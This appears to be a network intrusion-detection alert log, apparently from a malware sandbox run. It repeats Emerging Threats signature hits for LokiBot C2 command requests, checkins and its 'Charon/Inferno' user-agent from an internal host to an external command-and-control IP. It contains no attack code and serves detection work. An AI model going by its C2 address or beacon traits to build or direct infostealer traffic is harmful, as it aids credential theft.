                                              11/25/21-10:52:17.758848TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15033180192.168.11.20176.223.209.128
                                              11/25/21-10:52:17.758848TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5033180192.168.11.20176.223.209.128
                                              11/25/21-10:52:17.758848TCP2025381ET TROJAN LokiBot Checkin5033180192.168.11.20176.223.209.128
                                              11/25/21-10:52:17.758848TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25033180192.168.11.20176.223.209.128
                                              11/25/21-10:52:18.265321TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15033280192.168.11.20176.223.209.128
                                              11/25/21-10:52:18.265321TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5033280192.168.11.20176.223.209.128
                                              11/25/21-10:52:18.265321TCP2025381ET TROJAN LokiBot Checkin5033280192.168.11.20176.223.209.128
                                              11/25/21-10:52:18.265321TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25033280192.168.11.20176.223.209.128
                                              11/25/21-10:52:18.757231TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15033380192.168.11.20176.223.209.128
                                              11/25/21-10:52:18.757231TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5033380192.168.11.20176.223.209.128
                                              11/25/21-10:52:18.757231TCP2025381ET TROJAN LokiBot Checkin5033380192.168.11.20176.223.209.128
                                              11/25/21-10:52:18.757231TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25033380192.168.11.20176.223.209.128
                                              11/25/21-10:52:19.260157TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15033480192.168.11.20176.223.209.128
                                              11/25/21-10:52:19.260157TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5033480192.168.11.20176.223.209.128
                                              11/25/21-10:52:19.260157TCP2025381ET TROJAN LokiBot Checkin5033480192.168.11.20176.223.209.128
                                              11/25/21-10:52:19.260157TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25033480192.168.11.20176.223.209.128
                                              11/25/21-10:52:19.780978TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15033580192.168.11.20176.223.209.128
                                              11/25/21-10:52:19.780978TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5033580192.168.11.20176.223.209.128
                                              11/25/21-10:52:19.780978TCP2025381ET TROJAN LokiBot Checkin5033580192.168.11.20176.223.209.128
                                              11/25/21-10:52:19.780978TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25033580192.168.11.20176.223.209.128
                                              11/25/21-10:52:20.285330TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15033680192.168.11.20176.223.209.128
                                              11/25/21-10:52:20.285330TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5033680192.168.11.20176.223.209.128
                                              11/25/21-10:52:20.285330TCP2025381ET TROJAN LokiBot Checkin5033680192.168.11.20176.223.209.128
                                              11/25/21-10:52:20.285330TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25033680192.168.11.20176.223.209.128
                                              11/25/21-10:52:20.716730TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15033780192.168.11.20176.223.209.128
                                              11/25/21-10:52:20.716730TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5033780192.168.11.20176.223.209.128
                                              11/25/21-10:52:20.716730TCP2025381ET TROJAN LokiBot Checkin5033780192.168.11.20176.223.209.128
                                              11/25/21-10:52:20.716730TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25033780192.168.11.20176.223.209.128
                                              11/25/21-10:52:21.237790TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15033880192.168.11.20176.223.209.128
                                              11/25/21-10:52:21.237790TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5033880192.168.11.20176.223.209.128
                                              11/25/21-10:52:21.237790TCP2025381ET TROJAN LokiBot Checkin5033880192.168.11.20176.223.209.128
                                              11/25/21-10:52:21.237790TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25033880192.168.11.20176.223.209.128
                                              11/25/21-10:52:21.714998TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15033980192.168.11.20176.223.209.128
                                              11/25/21-10:52:21.714998TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5033980192.168.11.20176.223.209.128
                                              11/25/21-10:52:21.714998TCP2025381ET TROJAN LokiBot Checkin5033980192.168.11.20176.223.209.128
                                              11/25/21-10:52:21.714998TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25033980192.168.11.20176.223.209.128
                                              11/25/21-10:52:22.226975TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15034080192.168.11.20176.223.209.128
                                              11/25/21-10:52:22.226975TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5034080192.168.11.20176.223.209.128
                                              11/25/21-10:52:22.226975TCP2025381ET TROJAN LokiBot Checkin5034080192.168.11.20176.223.209.128
                                              11/25/21-10:52:22.226975TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25034080192.168.11.20176.223.209.128
                                              11/25/21-10:52:22.744389TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15034180192.168.11.20176.223.209.128
                                              11/25/21-10:52:22.744389TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5034180192.168.11.20176.223.209.128
                                              11/25/21-10:52:22.744389TCP2025381ET TROJAN LokiBot Checkin5034180192.168.11.20176.223.209.128
                                              11/25/21-10:52:22.744389TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25034180192.168.11.20176.223.209.128
                                              11/25/21-10:52:23.270426TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15034280192.168.11.20176.223.209.128
                                              11/25/21-10:52:23.270426TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5034280192.168.11.20176.223.209.128
                                              11/25/21-10:52:23.270426TCP2025381ET TROJAN LokiBot Checkin5034280192.168.11.20176.223.209.128
                                              11/25/21-10:52:23.270426TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25034280192.168.11.20176.223.209.128
                                              11/25/21-10:52:23.770525TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15034380192.168.11.20176.223.209.128
                                              11/25/21-10:52:23.770525TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5034380192.168.11.20176.223.209.128
                                              11/25/21-10:52:23.770525TCP2025381ET TROJAN LokiBot Checkin5034380192.168.11.20176.223.209.128
                                              11/25/21-10:52:23.770525TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25034380192.168.11.20176.223.209.128
                                              11/25/21-10:52:24.270030TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15034480192.168.11.20176.223.209.128
                                              11/25/21-10:52:24.270030TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5034480192.168.11.20176.223.209.128
                                              11/25/21-10:52:24.270030TCP2025381ET TROJAN LokiBot Checkin5034480192.168.11.20176.223.209.128
                                              11/25/21-10:52:24.270030TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25034480192.168.11.20176.223.209.128
                                              11/25/21-10:52:24.703353TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15034580192.168.11.20176.223.209.128
                                              11/25/21-10:52:24.703353TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5034580192.168.11.20176.223.209.128
                                              11/25/21-10:52:24.703353TCP2025381ET TROJAN LokiBot Checkin5034580192.168.11.20176.223.209.128
                                              11/25/21-10:52:24.703353TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25034580192.168.11.20176.223.209.128
                                              11/25/21-10:52:25.197758TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15034680192.168.11.20176.223.209.128
                                              11/25/21-10:52:25.197758TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5034680192.168.11.20176.223.209.128
                                              11/25/21-10:52:25.197758TCP2025381ET TROJAN LokiBot Checkin5034680192.168.11.20176.223.209.128
                                              11/25/21-10:52:25.197758TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25034680192.168.11.20176.223.209.128
                                              11/25/21-10:52:25.690005TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15034780192.168.11.20176.223.209.128
                                              11/25/21-10:52:25.690005TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5034780192.168.11.20176.223.209.128
                                              11/25/21-10:52:25.690005TCP2025381ET TROJAN LokiBot Checkin5034780192.168.11.20176.223.209.128
                                              11/25/21-10:52:25.690005TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25034780192.168.11.20176.223.209.128
                                              11/25/21-10:52:26.225157TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15034880192.168.11.20176.223.209.128
                                              11/25/21-10:52:26.225157TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5034880192.168.11.20176.223.209.128
                                              11/25/21-10:52:26.225157TCP2025381ET TROJAN LokiBot Checkin5034880192.168.11.20176.223.209.128
                                              11/25/21-10:52:26.225157TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25034880192.168.11.20176.223.209.128
                                              11/25/21-10:52:26.744009TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15034980192.168.11.20176.223.209.128
                                              11/25/21-10:52:26.744009TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5034980192.168.11.20176.223.209.128
                                              11/25/21-10:52:26.744009TCP2025381ET TROJAN LokiBot Checkin5034980192.168.11.20176.223.209.128
                                              11/25/21-10:52:26.744009TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25034980192.168.11.20176.223.209.128
                                              11/25/21-10:52:27.252180TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15035080192.168.11.20176.223.209.128
                                              11/25/21-10:52:27.252180TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5035080192.168.11.20176.223.209.128
                                              11/25/21-10:52:27.252180TCP2025381ET TROJAN LokiBot Checkin5035080192.168.11.20176.223.209.128
                                              11/25/21-10:52:27.252180TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25035080192.168.11.20176.223.209.128
                                              11/25/21-10:52:27.764927TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15035180192.168.11.20176.223.209.128
                                              11/25/21-10:52:27.764927TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5035180192.168.11.20176.223.209.128
                                              11/25/21-10:52:27.764927TCP2025381ET TROJAN LokiBot Checkin5035180192.168.11.20176.223.209.128
                                              11/25/21-10:52:27.764927TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25035180192.168.11.20176.223.209.128
                                              11/25/21-10:52:28.263374TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15035280192.168.11.20176.223.209.128
                                              11/25/21-10:52:28.263374TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5035280192.168.11.20176.223.209.128
                                              11/25/21-10:52:28.263374TCP2025381ET TROJAN LokiBot Checkin5035280192.168.11.20176.223.209.128
                                              11/25/21-10:52:28.263374TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25035280192.168.11.20176.223.209.128
                                              11/25/21-10:52:28.747393TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15035380192.168.11.20176.223.209.128
                                              11/25/21-10:52:28.747393TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5035380192.168.11.20176.223.209.128
                                              11/25/21-10:52:28.747393TCP2025381ET TROJAN LokiBot Checkin5035380192.168.11.20176.223.209.128
                                              11/25/21-10:52:28.747393TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25035380192.168.11.20176.223.209.128
                                              11/25/21-10:52:29.178594TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15035480192.168.11.20176.223.209.128
                                              11/25/21-10:52:29.178594TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5035480192.168.11.20176.223.209.128
                                              11/25/21-10:52:29.178594TCP2025381ET TROJAN LokiBot Checkin5035480192.168.11.20176.223.209.128
                                              11/25/21-10:52:29.178594TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25035480192.168.11.20176.223.209.128
                                              11/25/21-10:52:29.689703TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15035580192.168.11.20176.223.209.128
                                              11/25/21-10:52:29.689703TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5035580192.168.11.20176.223.209.128
                                              11/25/21-10:52:29.689703TCP2025381ET TROJAN LokiBot Checkin5035580192.168.11.20176.223.209.128
                                              11/25/21-10:52:29.689703TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25035580192.168.11.20176.223.209.128
                                              11/25/21-10:52:30.160809TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15035680192.168.11.20176.223.209.128
                                              11/25/21-10:52:30.160809TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5035680192.168.11.20176.223.209.128
                                              11/25/21-10:52:30.160809TCP2025381ET TROJAN LokiBot Checkin5035680192.168.11.20176.223.209.128
                                              11/25/21-10:52:30.160809TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25035680192.168.11.20176.223.209.128
                                              11/25/21-10:52:30.684075TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15035780192.168.11.20176.223.209.128
                                              11/25/21-10:52:30.684075TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5035780192.168.11.20176.223.209.128
                                              11/25/21-10:52:30.684075TCP2025381ET TROJAN LokiBot Checkin5035780192.168.11.20176.223.209.128
                                              11/25/21-10:52:30.684075TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25035780192.168.11.20176.223.209.128
                                              11/25/21-10:52:31.132269TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15035880192.168.11.20176.223.209.128
                                              11/25/21-10:52:31.132269TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5035880192.168.11.20176.223.209.128
                                              11/25/21-10:52:31.132269TCP2025381ET TROJAN LokiBot Checkin5035880192.168.11.20176.223.209.128
                                              11/25/21-10:52:31.132269TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25035880192.168.11.20176.223.209.128
                                              11/25/21-10:52:31.643581TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15035980192.168.11.20176.223.209.128
                                              11/25/21-10:52:31.643581TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5035980192.168.11.20176.223.209.128
                                              11/25/21-10:52:31.643581TCP2025381ET TROJAN LokiBot Checkin5035980192.168.11.20176.223.209.128
                                              11/25/21-10:52:31.643581TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25035980192.168.11.20176.223.209.128
                                              11/25/21-10:52:32.168793TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15036080192.168.11.20176.223.209.128
                                              11/25/21-10:52:32.168793TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5036080192.168.11.20176.223.209.128
                                              11/25/21-10:52:32.168793TCP2025381ET TROJAN LokiBot Checkin5036080192.168.11.20176.223.209.128
                                              11/25/21-10:52:32.168793TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25036080192.168.11.20176.223.209.128
                                              11/25/21-10:52:32.703571TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15036180192.168.11.20176.223.209.128
                                              11/25/21-10:52:32.703571TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5036180192.168.11.20176.223.209.128
                                              11/25/21-10:52:32.703571TCP2025381ET TROJAN LokiBot Checkin5036180192.168.11.20176.223.209.128
                                              11/25/21-10:52:32.703571TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25036180192.168.11.20176.223.209.128
                                              11/25/21-10:52:33.165058TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15036280192.168.11.20176.223.209.128
                                              11/25/21-10:52:33.165058TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5036280192.168.11.20176.223.209.128
                                              11/25/21-10:52:33.165058TCP2025381ET TROJAN LokiBot Checkin5036280192.168.11.20176.223.209.128
                                              11/25/21-10:52:33.165058TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25036280192.168.11.20176.223.209.128
                                              11/25/21-10:52:33.675960TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15036380192.168.11.20176.223.209.128
                                              11/25/21-10:52:33.675960TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5036380192.168.11.20176.223.209.128
                                              11/25/21-10:52:33.675960TCP2025381ET TROJAN LokiBot Checkin5036380192.168.11.20176.223.209.128
                                              11/25/21-10:52:33.675960TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25036380192.168.11.20176.223.209.128
                                              11/25/21-10:52:34.188796TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15036480192.168.11.20176.223.209.128
                                              11/25/21-10:52:34.188796TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5036480192.168.11.20176.223.209.128
                                              11/25/21-10:52:34.188796TCP2025381ET TROJAN LokiBot Checkin5036480192.168.11.20176.223.209.128
                                              11/25/21-10:52:34.188796TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25036480192.168.11.20176.223.209.128
                                              11/25/21-10:52:34.702326TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15036580192.168.11.20176.223.209.128
                                              11/25/21-10:52:34.702326TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5036580192.168.11.20176.223.209.128
                                              11/25/21-10:52:34.702326TCP2025381ET TROJAN LokiBot Checkin5036580192.168.11.20176.223.209.128
                                              11/25/21-10:52:34.702326TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25036580192.168.11.20176.223.209.128
                                              11/25/21-10:52:35.210581TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15036680192.168.11.20176.223.209.128
                                              11/25/21-10:52:35.210581TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5036680192.168.11.20176.223.209.128
                                              11/25/21-10:52:35.210581TCP2025381ET TROJAN LokiBot Checkin5036680192.168.11.20176.223.209.128
                                              11/25/21-10:52:35.210581TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25036680192.168.11.20176.223.209.128
                                              11/25/21-10:52:35.688599TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15036780192.168.11.20176.223.209.128
                                              11/25/21-10:52:35.688599TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5036780192.168.11.20176.223.209.128
                                              11/25/21-10:52:35.688599TCP2025381ET TROJAN LokiBot Checkin5036780192.168.11.20176.223.209.128
                                              11/25/21-10:52:35.688599TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25036780192.168.11.20176.223.209.128
                                              11/25/21-10:52:36.166352TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15036880192.168.11.20176.223.209.128
                                              11/25/21-10:52:36.166352TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5036880192.168.11.20176.223.209.128
                                              11/25/21-10:52:36.166352TCP2025381ET TROJAN LokiBot Checkin5036880192.168.11.20176.223.209.128
                                              11/25/21-10:52:36.166352TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25036880192.168.11.20176.223.209.128
                                              11/25/21-10:52:36.667414TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15036980192.168.11.20176.223.209.128
                                              11/25/21-10:52:36.667414TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5036980192.168.11.20176.223.209.128
                                              11/25/21-10:52:36.667414TCP2025381ET TROJAN LokiBot Checkin5036980192.168.11.20176.223.209.128
                                              11/25/21-10:52:36.667414TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25036980192.168.11.20176.223.209.128
                                              11/25/21-10:52:37.177630TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15037080192.168.11.20176.223.209.128
                                              11/25/21-10:52:37.177630TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5037080192.168.11.20176.223.209.128
                                              11/25/21-10:52:37.177630TCP2025381ET TROJAN LokiBot Checkin5037080192.168.11.20176.223.209.128
                                              11/25/21-10:52:37.177630TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25037080192.168.11.20176.223.209.128
                                              11/25/21-10:52:37.684362TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15037180192.168.11.20176.223.209.128
                                              11/25/21-10:52:37.684362TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5037180192.168.11.20176.223.209.128
                                              11/25/21-10:52:37.684362TCP2025381ET TROJAN LokiBot Checkin5037180192.168.11.20176.223.209.128
                                              11/25/21-10:52:37.684362TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25037180192.168.11.20176.223.209.128
                                              11/25/21-10:52:38.201110TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15037280192.168.11.20176.223.209.128
                                              11/25/21-10:52:38.201110TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5037280192.168.11.20176.223.209.128
                                              11/25/21-10:52:38.201110TCP2025381ET TROJAN LokiBot Checkin5037280192.168.11.20176.223.209.128
                                              11/25/21-10:52:38.201110TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25037280192.168.11.20176.223.209.128
                                              11/25/21-10:52:38.676993TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15037380192.168.11.20176.223.209.128
                                              11/25/21-10:52:38.676993TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5037380192.168.11.20176.223.209.128
                                              11/25/21-10:52:38.676993TCP2025381ET TROJAN LokiBot Checkin5037380192.168.11.20176.223.209.128
                                              11/25/21-10:52:38.676993TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25037380192.168.11.20176.223.209.128
                                              11/25/21-10:52:39.142414TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15037480192.168.11.20176.223.209.128
                                              11/25/21-10:52:39.142414TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5037480192.168.11.20176.223.209.128
                                              11/25/21-10:52:39.142414TCP2025381ET TROJAN LokiBot Checkin5037480192.168.11.20176.223.209.128
                                              11/25/21-10:52:39.142414TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25037480192.168.11.20176.223.209.128
                                              11/25/21-10:52:39.619722TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15037580192.168.11.20176.223.209.128
                                              11/25/21-10:52:39.619722TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5037580192.168.11.20176.223.209.128
                                              11/25/21-10:52:39.619722TCP2025381ET TROJAN LokiBot Checkin5037580192.168.11.20176.223.209.128
                                              11/25/21-10:52:39.619722TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25037580192.168.11.20176.223.209.128
                                              11/25/21-10:52:40.167312TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15037680192.168.11.20176.223.209.128
                                              11/25/21-10:52:40.167312TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5037680192.168.11.20176.223.209.128
                                              11/25/21-10:52:40.167312TCP2025381ET TROJAN LokiBot Checkin5037680192.168.11.20176.223.209.128
                                              11/25/21-10:52:40.167312TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25037680192.168.11.20176.223.209.128
                                              11/25/21-10:52:40.668286TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15037780192.168.11.20176.223.209.128
                                              11/25/21-10:52:40.668286TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5037780192.168.11.20176.223.209.128
                                              11/25/21-10:52:40.668286TCP2025381ET TROJAN LokiBot Checkin5037780192.168.11.20176.223.209.128
                                              11/25/21-10:52:40.668286TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25037780192.168.11.20176.223.209.128
                                              11/25/21-10:52:41.168892TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15037880192.168.11.20176.223.209.128
                                              11/25/21-10:52:41.168892TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5037880192.168.11.20176.223.209.128
                                              11/25/21-10:52:41.168892TCP2025381ET TROJAN LokiBot Checkin5037880192.168.11.20176.223.209.128
                                              11/25/21-10:52:41.168892TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25037880192.168.11.20176.223.209.128
                                              11/25/21-10:52:41.613994TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15037980192.168.11.20176.223.209.128
                                              11/25/21-10:52:41.613994TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5037980192.168.11.20176.223.209.128
                                              11/25/21-10:52:41.613994TCP2025381ET TROJAN LokiBot Checkin5037980192.168.11.20176.223.209.128
                                              11/25/21-10:52:41.613994TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25037980192.168.11.20176.223.209.128
                                              11/25/21-10:52:42.127400TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15038080192.168.11.20176.223.209.128
                                              11/25/21-10:52:42.127400TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5038080192.168.11.20176.223.209.128
                                              11/25/21-10:52:42.127400TCP2025381ET TROJAN LokiBot Checkin5038080192.168.11.20176.223.209.128
                                              11/25/21-10:52:42.127400TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25038080192.168.11.20176.223.209.128
                                              11/25/21-10:52:42.627468TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15038180192.168.11.20176.223.209.128
                                              11/25/21-10:52:42.627468TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5038180192.168.11.20176.223.209.128
                                              11/25/21-10:52:42.627468TCP2025381ET TROJAN LokiBot Checkin5038180192.168.11.20176.223.209.128
                                              11/25/21-10:52:42.627468TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25038180192.168.11.20176.223.209.128
                                              11/25/21-10:52:43.136376TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15038280192.168.11.20176.223.209.128
                                              11/25/21-10:52:43.136376TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5038280192.168.11.20176.223.209.128
                                              11/25/21-10:52:43.136376TCP2025381ET TROJAN LokiBot Checkin5038280192.168.11.20176.223.209.128
                                              11/25/21-10:52:43.136376TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25038280192.168.11.20176.223.209.128
                                              11/25/21-10:52:43.624345TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15038380192.168.11.20176.223.209.128
                                              11/25/21-10:52:43.624345TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5038380192.168.11.20176.223.209.128
                                              11/25/21-10:52:43.624345TCP2025381ET TROJAN LokiBot Checkin5038380192.168.11.20176.223.209.128
                                              11/25/21-10:52:43.624345TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25038380192.168.11.20176.223.209.128
                                              11/25/21-10:52:44.069423TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15038480192.168.11.20176.223.209.128
                                              11/25/21-10:52:44.069423TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5038480192.168.11.20176.223.209.128
                                              11/25/21-10:52:44.069423TCP2025381ET TROJAN LokiBot Checkin5038480192.168.11.20176.223.209.128
                                              11/25/21-10:52:44.069423TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25038480192.168.11.20176.223.209.128
                                              11/25/21-10:52:44.502012TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15038580192.168.11.20176.223.209.128
                                              11/25/21-10:52:44.502012TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5038580192.168.11.20176.223.209.128
                                              11/25/21-10:52:44.502012TCP2025381ET TROJAN LokiBot Checkin5038580192.168.11.20176.223.209.128
                                              11/25/21-10:52:44.502012TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25038580192.168.11.20176.223.209.128
                                              11/25/21-10:52:45.027630TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15038680192.168.11.20176.223.209.128
                                              11/25/21-10:52:45.027630TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5038680192.168.11.20176.223.209.128
                                              11/25/21-10:52:45.027630TCP2025381ET TROJAN LokiBot Checkin5038680192.168.11.20176.223.209.128
                                              11/25/21-10:52:45.027630TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25038680192.168.11.20176.223.209.128
                                              11/25/21-10:52:45.511486TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15038780192.168.11.20176.223.209.128
                                              11/25/21-10:52:45.511486TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5038780192.168.11.20176.223.209.128
                                              11/25/21-10:52:45.511486TCP2025381ET TROJAN LokiBot Checkin5038780192.168.11.20176.223.209.128
                                              11/25/21-10:52:45.511486TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25038780192.168.11.20176.223.209.128
                                              11/25/21-10:52:46.026918TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15038880192.168.11.20176.223.209.128
                                              11/25/21-10:52:46.026918TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5038880192.168.11.20176.223.209.128
                                              11/25/21-10:52:46.026918TCP2025381ET TROJAN LokiBot Checkin5038880192.168.11.20176.223.209.128
                                              11/25/21-10:52:46.026918TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25038880192.168.11.20176.223.209.128
                                              11/25/21-10:52:46.539469TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15038980192.168.11.20176.223.209.128
